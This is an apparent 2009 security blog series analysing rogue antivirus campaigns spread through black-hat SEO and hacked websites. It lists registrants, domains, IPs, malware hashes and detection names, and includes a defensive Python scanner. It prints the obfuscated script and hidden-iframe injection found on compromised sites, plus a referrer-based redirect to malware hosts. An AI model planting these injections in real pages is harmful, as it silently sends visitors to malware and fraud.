Sunday, March 29, 2009

Black Hat SEO and Rogue Antivirus p.3

The silent threat: Black Hat SEO and Rogue Antivirus

AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com

READ THIS page if you need more information

In addition to the fake scanner domains, recent research also reveals that several sites are
registered through "EVOPLUS LTD" with the following registrant information:

Registrant:
Live Internet Marketing Limited ****@liveinternetmarketingltd.com
attn: Private Registrations
5285 Decarie Boulevard #100
Montreal, QC H3W3C2
Canada
+1-514-371-5650

Domain Name: LIVEINTERNETMARKETINGLTD.COM
Registrar: EVOPLUS LTD
Whois Server: whois.evonames.com
Referral URL: http://www.evonames.com
Name Server: NS1.LIVEINTERNETMARKETINGLTD.COM
Name Server: NS2.LIVEINTERNETMARKETINGLTD.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 27-mar-2009
Creation Date: 20-feb-2009
Expiration Date: 20-feb-2010

Registered Through:
AdvancedHosters.com (http://www.AdvancedHosters.com)

******************************

A Google search shows absolutely no web presence apart from malware and pornography websites:

For "liveinternetmarketingltd": malware domain drop and pornography websites
For "Live Internet Marketing Limited": pornography websites
For "liveinternetmarketingltd.com": pornography websites and a malware domain found by Malware Domain List.

A search on Malware Domain List shows 23 sites with the registrant information "liveinternetmarketingltd.com".

Some of these domains have been added to the list below:


**********************

SUSPENDED domain

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM

antivirusplus.biz
***
antivirusplus2009.net
Symantec Result
Registration Service Provided By: HIGH QUALITY HOST COMPANY
***
avplus2009.com
Symantec Result
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
***
internet-check.net
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
***
traffchecking.com

Registration Service Provided By: ERDOMAIN.COM
Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com


**********************

ACTIVE domain

***
av-plus-support.com
PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM
***

antivirusplussite.com has a fake error page which redirects to downloadantivirusplus.com/buy.php?id=

downloadantivirusplus.com is also hosted on the same IP at ZlKon and is also registered by "Live Internet Marketing Limited"; the fraudulent payment page is on the domain below:

https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=

209.8.25.204 - ns1.secure-plus-payments.com

Registration Service Provided By: RESELLERCLUB

Registrant:
Globo inc
John Sparck (sparck000@mail.com)
South reg, 14 st, 3
Atoll
,3290867
BB
Tel. +27.221994

"Globo inc" domains include: antivirus--plus.com, plus-antivirus.com (already suspended)

**********************
A Spamhaus lookup also reveals:

newp-digital.com
webspywareremover2009.com
cure-soft.com [63.219.177.210]
innovagest2000s.com
secure-softwaretools.com [207.226.175.124]
**********************


Hosted on 94.247.2.215 [hs.2-215.zlkon.lv], AS12553

AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.

Some screenshot






Analysis:


File info: installer_1.exe
File size: 666112 bytes
MD5: 03a1e599d66c64cd11eb5f20d3645767

Anubis: Report
ThreatExpert: Report
VirusTotal: Report

First received: 03.27.2009 17:40:50 (CET)
Results: 17/38 (44.74%)

Aliases (vendor):
Trojan.Win32.FakeXPA!IK (a-squared)
TR/Crypt.XPACK.Gen (Antivir)
SHeur2.YCE (AVG)
(Suspicious) - DNAScan (CAT-QuickHeal)
Trojan.DownLoad.33473 (DrWeb)
Trojan-Downloader.Win32.Delf.swq (F-Secure)
W32/FakeAV.NW!tr (Fortinet)
Trojan.Win32.FakeXPA (Ikarus)
Trojan-Downloader.Win32.Delf.swq (Kaspersky)
Generic Downloader.x (McAfee)
Generic Downloader.x (McAfee)
Trojan.Crypt.XPACK.Gen (McAfee-GW-Edition)
TrojanDownloader:Win32/Renos.BAO (Microsoft)
Suspicious File (Panda)
Troj/FakeAV-NW (Sophos)
Trojan.Fakeavalert.B (Sunbelt)
Trojan Horse (Symantec)

We can see on this post that the file downloaded two or three days later has been updated with new code.

Result when running:
 
HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv]

GET: myantivirusplus.com/install/AntivirusPlus.exe
GET: myantivirusplus.com/install/InternetExplorer.dll
GET: myantivirusplus.com/cfg/dmns.cfg


File info: AntivirusPlus.exe
File size: 1435136 bytes
MD5: f0bc697765f31bd431e776387aca2c7f

Anubis: Report
VirusTotal: First Report
VirusTotal: Second Report

First received: 03.27.2009 14:17:34 (CET)
Results: 7/39 (17.95%)

Second time: 03.30.2009 05:23:52 (CET)
Results: 12/39 (30.77%)
New info: Prevx

Aliases:
Trojan.Win32.FakeXPA!IK
FakeAlert
Trojan.Win32.FakeXPA
Trojan:Win32/FakePlus

File info: InternetExplorer.dll
File size: 442368 bytes
MD5: 8e428574cb9e4f680d1e28fe3ca673e8

VirusTotal: First Report
VirusTotal: Second Report

First received: 03.24.2009 16:12:30 (CET)
Results: 20/39 (51.29%)

Second time: 03.30.2009 05:23:52 (CET)
Results: 20/39 (51.29%)

Aliases:
Trojan.Win32.FraudPack.ify
Trojan.Win32.FakeAV.iy
Trojan.Win32.FakeXPA
Trojan:Win32/FakePlus


Screenshot:
 

Saturday, March 28, 2009

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus

The World Wide Web Consortium and Rogue AV

Has your website been hacked, with IFRAMEs, trojans or backdoors injected?

Have your pages been infected with redirections to rogue antivirus/antispyware?

Have your pages been replaced with a World Wide Web Consortium article with some
obfuscated JavaScript code appended to them?


This page will show you some recent research about a malware campaign which has infected thousands of websites. In this campaign all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard (sometimes called WinWebSecurity or SystemSecurity2009, together with InternetAntivirusPro).

Since July/August 2008, hundreds of thousands of pages on legitimate domains have been exploited: web pages stuffed with keywords (porn, celebrities, popular snacks) are uploaded to them as a means of attracting victims via search engine results. In some cases the homepage of the compromised site is modified to append hidden links to the malicious web page.

All information indicates that, on all these domains, the attack was carried out with stolen FTP passwords.

An alarming observation is that the activity grows at an exponential rate, with malware/exploit code that is ever more sophisticated.

You can find IPs, networks and domains used, examples of hacked pages/websites and other malicious code injected into these domains at the links below or on other pages of this blog.

The silent threat: Black Hat SEO and Rogue AV - 1
The silent threat: Black Hat SEO and Rogue AV - 2

*********************

The screenshot below shows a large number of websites also used in this rogue AV malware campaign, but with World Wide Web Consortium (W3C) pages uploaded to them with JavaScript code injected.



Source of one of these sites.





In a browser.



Deobfuscation results:

window.location = encodeURI(
"http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" +
encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" +
encodeURIComponent(document.URL) + "&default_keyword=XXX");

-----------------------

The source code also reveals thousands of hacked websites. Analysis of the JavaScript code shows it redirects to onlinedetect.com or other domains used in this attack.
You can find more information on this page.

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign


Earlier in March, Adobe released security updates addressing vulnerabilities and exploits
targeting Adobe Reader. Some links can be found below:

McAfee Avert Labs: New Backdoor Attacks using PDF Documents
Trend Micro Malware Blog: Portable Document Format or Portable Malware Format?
SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild?

Adobe Security Bulletin: Buffer overflow issue

Here is a complete example with screenshots, data and analysis of a website
used in the PDF malware campaign and hosting a malicious application called SUTRA.

The application, also known as a "Traffic Management System", is explained by
McAfee Avert Labs on this page: Inside the malicious traffic

This cybercrime toolkit is actively used to manage traffic from compromised
websites and to redirect visitors to exploit code or other malicious URLs serving
fake codecs, rogue antispyware applications, keyloggers, banking trojans and many more.

We have another example of a compromised website explained here.
A screenshot of SUTRA can also be found here.

***

Now let's take a look at another website used.

The site is "salevisitor.net" 89.107.104.10
[Do not enter this site unless you know what you are doing]

The payload is located here "salevisitor.net/in.cgi?6" [Unstable - file not found at this time]

For reference, this is the file/folder structure of the SUTRA Traffic Manager:

drwxr-xr-x (755) admin
drwxrwxrwx (777) data
drwxr-xr-x (755) files
drwxr-xr-x (755) html
drwxr-xr-x (755) install
drwxrwxrwx (777) memory
drwxrwxrwx (777) stats
drwxrwxrwx (777) admin/tmp
drwxrwxrwx (777) admin/tmp.web
   
-rwxr-xr-x (755) getos.cgi
-rwxr-xr-x (755) in.cgi
-rw-r--r-- (644) index.html
   
admin:  
-rwxr-xr-x (755) c.cgi
-rwxr-xr-x (755) center.cgi
-rwxr-xr-x (755) cron
-rwxr-xr-x (755) cron.sh
-rw-r--r-- (644) index.html
-rw-r--r-- (644) panel.html
drwxrwxrwx (777) tmp
drwxrwxrwx (777) tmp.web
-rwxr-xr-x (755) ub_fetcher
   
data:  
-rw-r--r-- (644) admin_forces.html
-rw-r--r-- (644) connection_type.html
-rw-r--r-- (644) connection_type_new.html
-rw-r--r-- (644) crontab_wizard.html
-rw-r--r-- (644) edit_force_data.html
-rw-r--r-- (644) edit_force.html
-rw-r--r-- (644) edit.html
-rw-r--r-- (644) edit_user.html
-rw-r--r-- (644) force_data.html
-rw-r--r-- (644) force.html
-rw-r--r-- (644) forces.html
-rw-r--r-- (644) forces_view.html
-rw-r--r-- (644) general_stat.html
-rw-r--r-- (644) GeoIP.dat
-rw-r--r-- (644) geoip.html
-rw-r--r-- (644) global_options.html
-rw-r--r-- (644) global_vars.html
-rw-r--r-- (644) import.html
-rw-r--r-- (644) index.html
-rw-r--r-- (644) key
-rw-r--r-- (644) login.html
-rw-r--r-- (644) lstats_export.html
-rw-r--r-- (644) lstats.html
-rw-r--r-- (644) main.html
-rw-r--r-- (644) navigation.html
-rw-r--r-- (644) page.html
-rw-r--r-- (644) pages_navigation.html
-rw-r--r-- (644) profile.html
-rw-r--r-- (644) pstats_export.html
-rw-r--r-- (644) pstats.html
-rw-r--r-- (644) pstats_index.html
-rw-r--r-- (644) register_done.html
-rw-r--r-- (644) register.html
-rw-r--r-- (644) search.html
-rw-r--r-- (644) show_bottom.html
-rw-r--r-- (644) show_data.html
-rw-r--r-- (644) show_header.html
-rw-r--r-- (644) stat_daily.html
-rw-r--r-- (644) static_stat.html
-rw-r--r-- (644) stat_main.html
-rw-r--r-- (644) stats.html
-rw-r--r-- (644) uptime_main.html
-rw-r--r-- (644) users.html
   
files:  
-rw-r--r-- (644) cgi.pm
-rw-r--r-- (644) counter.gif
-rwxr-xr-x (755) curl
-rwxr-xr-x (755) default.cgi
-rwxr-xr-x (755) gotourl.cgi
   
html:  
-rw-r--r-- (644) image files and javascript (gif, js)
   
install:  
drwxr-xr-x (755) freebsd4 // in.cgi
drwxr-xr-x (755) freebsd5 // in.cgi
drwxr-xr-x (755) freebsd6 // in.cgi
drwxr-xr-x (755) linux // in.cgi
   
stats:  
-rw-r--r-- (644) index.html

The admin page has no password on this server, so anyone can enter and see stats like:




So now we know the IP, domain name and URLs used after redirection,
but where is the traffic coming from?

Let's take a look at another folder, "/memory/".

This folder contains files such as 1.access.log, 2.access.log, 5.access.log,
25.access.log, 70.access.log, etc.

Some related topics on this blog refer to onlinedetect.com and 0day33hours.com for another malware campaign. Similar files can be found using Google: here and here

2.access.log - The file contains the IPs of visitors reaching infected
websites; some are in the Czech Republic, Israel, Russia, Turkey, etc.
The file also reveals the URLs of some compromised websites
where the malicious obfuscated JavaScript code has been inserted.



Line 1:

hxxp://www.met[BLOCKED]p.com.pl/meta...........
Javascript Analysis

Line 23: 77.250.xx.xx

http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find.....
Javascript Analysis

hxxp://www.gif[BLOCKED]za.pl/gify/baj...
Javascript Analysis

The analysis confirms that all these sites have the same code added:

<script>
if (!myia){ document.write(unescape('
%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%35
%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%73%61%6c
%65%76%69%73%69%74%6f%72%2e%6e%65%74%2f%69%6e%2e
%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75
%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29
%2a%32%31%35%32%38%29%2b%27%37%30%65%33%66%35%31
%63%35%27%20%77%69%64%74%68%3d%35%32%20%68%65%69
%67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%27%64
%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f
%69%66%72%61%6d%65%3e'));
}
var myia = true; </script>
 
<iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+
Math.round(Math.random()*21528)+'70e3f51c5'
width=52 height=414 style='display: none'></iframe>
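As an added example (not the blog author's code), the following Python script scans a saved copy of a web page for the two injection patterns documented on this page: the document.write(unescape('...')) blob above that writes a hidden iframe to the salevisitor.net in.cgi redirector, and the referrer-keyed window.location redirect to onlinedetect.com shown in the W3C-page deobfuscation. The sample page embedded in it is constructed from the snippets quoted on this page; the function names are mine.

```python
import re
from urllib.parse import unquote

# Constructed sample page: the unescape() blob quoted above (hidden iframe to
# salevisitor.net/in.cgi?2) plus the referrer-keyed onlinedetect.com redirect
# from the W3C-page deobfuscation, dropped into an otherwise benign page.
INJECTED_BLOB = (
    "%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%35%20%73%72%63%3d%27"
    "%68%74%74%70%3a%2f%2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e%65%74"
    "%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28"
    "%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35%32%38%29%2b%27"
    "%37%30%65%33%66%35%31%63%35%27%20%77%69%64%74%68%3d%35%32%20%68%65"
    "%69%67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61"
    "%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e"
)
SAMPLE_HTML = (
    "<html><body><h1>Recipes</h1>\n<script>\n"
    "if (!myia){ document.write(unescape('" + INJECTED_BLOB + "'));\n}\n"
    "var myia = true; </script>\n"
    '<script>window.location = encodeURI("http://www.onlinedetect.com/in.cgi?7'
    '&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" + '
    'encodeURIComponent(document.referrer) + "&parameter=$keyword");</script>\n'
    "</body></html>"
)

UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*['\"]?([^'\"\s>]+)", re.I)
# Hidden by CSS, or squeezed to a 0/1 pixel box: the iframe is not meant to be seen.
HIDDEN_RE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|\b(?:width|height)\s*=\s*['\"]?[01]\b", re.I)
LOCATION_RE = re.compile(r"(?:window|document|top|self)\.location(?:\.href)?\s*=\s*(.*?);", re.S)
URL_RE = re.compile(r"https?://[^\"'\s)]+")
REDIRECTOR_RE = re.compile(r"/in\.cgi\?\d+", re.I)  # in.cgi?N traffic-manager entry point


def js_unescape(text):
    """Approximate JavaScript unescape(): %uXXXX code points, then %XX as Latin-1 bytes."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text, encoding="latin-1")


def decode_unescape_blobs(html):
    """Decoded payload of every unescape('...') call found in the page."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_RE.finditer(html)]


def hidden_iframe_sources(markup):
    """src attribute of each iframe that is hidden by CSS or by a 0/1-pixel size."""
    found = []
    for tag in IFRAME_RE.finditer(markup):
        tag_text = tag.group(0)
        src = SRC_RE.search(tag_text)
        if src and HIDDEN_RE.search(tag_text):
            found.append(src.group(1))
    return found


def referrer_keyed_redirects(markup):
    """Target of each location assignment whose value is built from document.referrer."""
    targets = []
    for m in LOCATION_RE.finditer(markup):
        expr = m.group(1)
        if "document.referrer" in expr:
            url = URL_RE.search(expr)
            targets.append(url.group(0) if url else expr.strip())
    return targets


def scan_page(html):
    """Return (finding, detail) pairs; an empty list means none of the patterns matched."""
    findings = []
    decoded = decode_unescape_blobs(html)
    for blob in decoded:
        for src in hidden_iframe_sources(blob):
            findings.append(("hidden_iframe_in_unescape", src))
    for src in hidden_iframe_sources(html):
        findings.append(("hidden_iframe", src))
    for url in referrer_keyed_redirects(html):
        findings.append(("referrer_keyed_redirect", url))
    # Any URL, raw or decoded, that points at an in.cgi?N redirector.
    for url in URL_RE.findall(html + "\n" + "\n".join(decoded)):
        if REDIRECTOR_RE.search(url) and ("traffic_redirector_url", url) not in findings:
            findings.append(("traffic_redirector_url", url))
    return findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

Run it against files pulled from a suspect web root (or against a saved response body) rather than in a browser, so the decoded iframe is never rendered.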

Analysis report for hxxp://salevisitor.net/in.cgi?2

The script loads a PDF located at quara-best.com/[BLOCKED]e30/pdf.php?id=5352,
which then loads this executable --> VirusTotal Report

******************

Some other related links:

Honeynet Malware Detail
Analysis of hxxp://eternal.alfamoon.com here

MySpace Profile Attacked (screenshot below)



loyaldown-loyaltube Fake Codec and RogueAV

loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus

loyaldown09.com and loyaltube10.com are sites that distribute fake codecs.
On this network we also have sites which host rogue applications such as
XP-Police-Antivirus and Win-PC-Defender.

Fake codec and fake scanner page screenshots

loyaltube10.com [213.163.65.10]
loyaldown09.com [213.163.65.9]

hxxp://loyaltube10.com/scan/?id=..



hxxp://loyaltube10.com/tube/?id=...&title=adult+movie




Analysis:


Redirector used: hxxp://us-euro.biz/in.cgi?4&parameter=wifi [195.190.13.234]
Analysis here

Site URLs:
hxxp://loyaltube10.com/scan/?id=..
hxxp://loyaltube10.com/tube/?id=197&title=adult+movie
hxxp://loyaldown11.com/codec/.exe
hxxp://loyaldown11.com/codec/189.exe
hxxp://loyaldown11.com/codec/197.exe

File info: codec.exe
File size: 107011 bytes
MD5: 704298be5c6bf8671517c79b827c9206

ThreatExpert: Report
VirusTotal: Report
Anubis: Report (related: WinPC Defender)

First received: 03.29.2009 01:17:30 (CET)
Results: 6/39 (15.39%)

Aliases (vendor):
(Suspicious) - DNAScan (CAT-QuickHeal)
Suspicious File (eSafe)
Downloader-BON (McAfee)
Downloader-BON (McAfee+Artemis)
TrojanDropper:Win32/Insebro.A (Microsoft)
Malware-Cryptor.Win32.Zorq (VBA32)



Site URLs:
hxxp://tubeloyal.com/scan/?id-..
hxxp://loyaldown11.com/codec/.exe

File info: codec.exe
File size: 107008 bytes
MD5: eb61517f7f0906dc0e60f0e0afd1bbf1

ThreatExpert: Report
VirusTotal: Report
Anubis: Report (related: WinPC Defender)

First received: 03.29.2009 01:41:38 (CET)
Results: 6/39 (15.39%)

Aliases (vendor):
(Suspicious) - DNAScan (CAT-QuickHeal)
Suspicious File (eSafe)
Downloader-BON (McAfee)
Downloader-BON (McAfee+Artemis)
TrojanDropper:Win32/Insebro.A (Microsoft)
Malware-Cryptor.Win32.Zorq (VBA32)

Associated websites:
 

av-best-info Anti-VirusN1 Rogue FakeXPA

av-best.info "VirusDoctor Online Scan" Anti-Virus1 Rogue FakeXPA

av-best.info is a site that distributes AntivirusN1, a rogue antivirus application.
AntiVirusN1 displays fake alerts in order to persuade users to buy it.

Registry keys/values must be deleted with an antivirus / antispyware tool.
Anti-Virus Number-1 can be removed by stopping the following processes and deleting the following files:

- Kill processes: N1Two.exe, N1i.exe, 2.exe, 3.exe
- Unregister DLLs (regsvr32 /u [dll_name]): QWProtect.dll

- Delete files and folders:

  - C:\Documents and Settings\All Users\Application Data\N1
  - %CommonAppData%\N1
  - %CommonPrograms%\Anti-Virus Number-1

This site appears normal at first sight.

Antivirus 1 Site Screenshot

Antivirus 1 Payment system

Payment for this fraudulent rogue program is handled via Plimus (screenshot below)

Antivirus 1 Payment system by Plimus

But the site has been reported as malicious by some users. Here is the fake scanner:

Site screenshot:

Fake Security Warning Message:

Adware.Win32.Look2me.ab Virus Critical
Backdoor.Win32.Haxdoor.gu Virus High
Trojan-Downloader.Win32.Small.dge Virus High
Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium
W32.Benjamin.Worm Virus High
W32.Mypics.Worm.36352 Virus Medium
W32.Yaha.B@mm Virus Critical
Trojan Horse Generic11.OQJ Virus High
Magic DVD Ripper Virus High
Recommend: Click "Start Protection" button to erase all threats

Fake Security Warning Message

Fake Security Warning Message: Threat detected

Fake scanner page


Fake messages:

Fake Security Warning Message

Alert! Your PC is at risk of virus and spyware attack.

Your system requires immediate check!
System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs.

Associated websites [174.142.113.206] [ip-174-142-113-206.static.privatedns.com]:

scanner.av-best.info
download.av-best.info

Analysis:


Site URLs:
hxxp://scanner.av-best.info/scan.php?campaign=mmb_3593020743&landid=4
hxxp://download.av-best.info/install.php?campaign=mmb_3593020743&country=en&counter=0&campaign=mmb_3593020743&landid=4

File info: AntiVirusInstaller.exe
File size: 53278 bytes
MD5: f8d38325d9570ce3320f04e9d5278466

ThreatExpert: Report
VirusTotal: Report
Anubis: Report

First received: 03.28.2009 19:18:31 (CET)
Results: 8/39 (20.52%)

Aliases (vendor):
TR/Crypt.CFI.Gen (AntiVir)
Win32.Packed.Krap.c.4 (CAT-QuickHeal)
Trojan.DownLoad.33135 (DrWeb)
Suspicious File (eSafe)
Trojan.Crypt.CFI.Gen (McAfee-GW-Edition)
Trojan:Win32/FakeXPA (Microsoft)
Suspicious File (Panda)
Cryp_FakeAV-11 (TrendMicro)

When running:



HTTP Requests: [70.38.11.165]
http://70.38.11.165/admin/cgi-bin/get_domain.php?type=site
Content html: av-best.info

http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download
Content html: download.av-best.info

[174.142.113.206]
hxxp://download.av-best.info/en/PE/2.exe
hxxp://download.av-best.info/en/PE/3.exe
hxxp://download.av-best.info/en/PE/en/PE/N1.CAB
hxxp://download.av-best.info/en/PE/en/PE/QWProtect.dll
hxxp://download.av-best.info/en/PE/en/PE/svchost.exe

File info: 2.exe
File size: 53248 bytes
MD5: 364f5d30dba520937f9f3b7979b389b1
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:07 (CET)
8/39 (20.52%)
ThreatExpert: Report
Prevx: Report

File info: 3.exe
File size: 257536 bytes
MD5: b7d14c7ea7844057efcfd1a41ddc530f
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:18 (CET)
6/39 (15.39%)
ThreatExpert: Report

File info: AntiVirusInstaller.exe
File size: 53278 bytes
MD5: f8d38325d9570ce3320f04e9d5278466
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:19 (CET)
8/38 (21.06%)
ThreatExpert: Report

File info: N1.CAB
File size: 504489 bytes
MD5: c37aa0887be14b68381301e24ddaf8fb
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs
Received on 03.28.2009 22:08:51 (CET)
5/38 (13.16%)

File info: N1.exe
File size: 527360 bytes
MD5: 2d6a49219639d63428b91eb7647ce491
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs
Received on 03.28.2009 22:09:09 (CET)
5/38 (13.16%)
ThreatExpert: Report

File info: QWProtect.dll
File size: 697856 bytes
MD5: 1b6c35cb941eaa9f6325a449cb6770b0
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:09:01 (CET)
4/38 (10.53%)
Prevx: Report
ThreatExpert: Report

File info: svchost.exe
File size: 80896 bytes
MD5: c2613b801da4c8b6967d6da05c0443ed
VirusTotal: Report - Alias: Trojan.Win32/FakeXPA
Received on 03.28.2009 22:08:47 (CET)
10/38 (26.32%)
Prevx: Report
ThreatExpert: Report

Result when running:

Displays a fake blue screen "MALWARE.MONSTER.DX_NEW_0xA21518F0"

Fake bluescreen message: MALWARE.MONSTER.DX_NEW_0xA21518F0

Rogue Anti-Virus Number-1

Anti-Virus Number-1 Rogue Application Screenshot:
 



Friday, March 27, 2009

Black Hat SEO and Rogue Antivirus

The silent threat: Black Hat SEO and Rogue Antivirus

Messages telling you to install or update security software for your computer are scary messages.
This tactic is known as scareware: http://en.wikipedia.org/wiki/Scareware

Related article about "Free Security Scan" alerts from the Federal Trade Commission
Court Halts Bogus Computer Scans
"Free Security Scan" Could Cost Time and Money



For several months now, massive attacks (obfuscated JavaScript inserted into pages, IFRAMEs used to inject backdoors/keyloggers) and thousands of hacked websites used to distribute rogue antivirus have been detected by major antivirus vendors, cyber intelligence labs and other security companies.

The exponential growth of rogue antivirus distribution through legitimate websites remains silent, as the tactics used by the creators continue to become more sophisticated.

Related article: Scammers making '$15m a month' on fake antivirus
PandaLabs: 22,000 New Malware Samples Detected Every Day in 2008
PandaLabs Annual Report

Rogue AV Detections in 2008

Sites on this blog refer to rogue antispyware which displays misleading scan alerts and is mostly installed on victims' computers without user consent through infected websites (LEGITIMATE infected websites).


UPDATE:

The site now includes IPs / botnet C&C / exposed data logs, links to LIVE URLs of exploits/vulnerabilities (Flash, PDF), domains with their relations, routes and AS, and malicious scripts found on
compromised websites related to the same campaign.



If you arrived at this page through a search engine while looking for a domain mentioned in this blog, some removal information can be found at the links below. Site analyses will be created and updated as new sites are found, twice or more a day if needed.

If you arrived at this page and are interested in finding information about these attacks,
the IPs, domains and networks used, here are some links with details about this malware campaign

Related article:

Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009
Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360
Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop
Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009
Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro
Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants

Black Hat SEO and Rogue Antivirus:

Part. 1) Black Hat SEO and Rogue Antivirus
Part. 2) Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery
Part. 3) Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and liveinternetmarketingltd.com
Part. 4) Black Hat SEO and Rogue Antivirus: Full or Rogues
Part. 5) Black Hat SEO and Rogue Antivirus: Full of Hacks
Part. 6) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1
Part. 7) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2
Part. 8) Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger

Black Hat SEO - Exploit, scripts, botnet C&C, hacks toolkit etc.

Part. 1) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked
Part. 2) Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats
Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimaware toolkits in the wild


And here we have a list of fake scanner websites used in the attack which infects thousands of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): Black Hat SEO and Rogue Antivirus

Note:

Other rogue AV such as AntivirusPlus has recently been detected through this list

Many more, under names like FakeSpyGuard, VirusRemover, WinAntiVirus2008, SpywareRemover2009, and some variants of "Trojan Hiloti", also appear through this list

Similar attacks with Google search strings:

In 2008: we have an example with "Antivirus 2009" on the Trend Micro Malware Blog:
A Million Search Strings to Get Infected

A few days ago: on the CA website, "onlinestabilityworld.com" is cited. The article is here:
Rogue Security Software keeps on hitting Google searches

Another list of fake codec websites from March, on Dancho Danchev's blog, is also cited on this blog:
Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software

Recent searches also reveal the use of the powerful JavaScript library jQuery; the screenshot below was retrieved from a legitimate infected website.

Deobfuscated result is:



The IP is 94.247.2.195 (ZlKon)




Networks used for hosting these malicious websites are:

Starline Web Services in Estonia
Zlkon in Latvia
netdirekt e.K. in Germany
Hetzner Online AG in Germany
Ural-NET in Russia
Eurohost LLC in Ukraine
GloboTech via Olexij Khrenov in Ukraine
Joint Multimedia Cable Network in Ukraine
NTColo Networks in Ukraine
Plitochnik Lux LTD in Ukraine
Coloquest in US
Netelligent Hosting Services Inc in US
and some others in China and Moldavia.
IPs, AS and network used can be found on this blog.

-------------
New sites used

on March 28: slot4scan.com, scan4fuse.com, list4scan.com, scan4home.com, gotimescan.com
on March 29: mainscan6.com, scan4plus.info, scan4open.com

on March 30:

logscan6.com
scan4way.com [redirection by gostepscan.com]
5scanav.com and scan5plus.com [redirection by gowithscan.com]
new4scan.info, scan4live.info

April:

best4scan.info, best6scan.info, pro4scan.info, scanline6.com, scan6log.com, scan6main.com, scan6now.com, zpmuwbtqqwkw.net
Analysis here

-------------


Related article: The rash of rogue av (PDF)

Related article about McColo Business:
Similar network at UltraNet Ltd in Latvia
HostExploit’s Cyber Crime Series (PDF)

The list on the right-hand side shows the latest websites used in this malware campaign (updated daily).

Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia.
Pages related to the same attack (including some other problems: SPAM, botnets, etc.):

December  15, 2008:
FakeAV and Codecs
http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/

December  19, 2008:
SPAM IP Detected
http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html
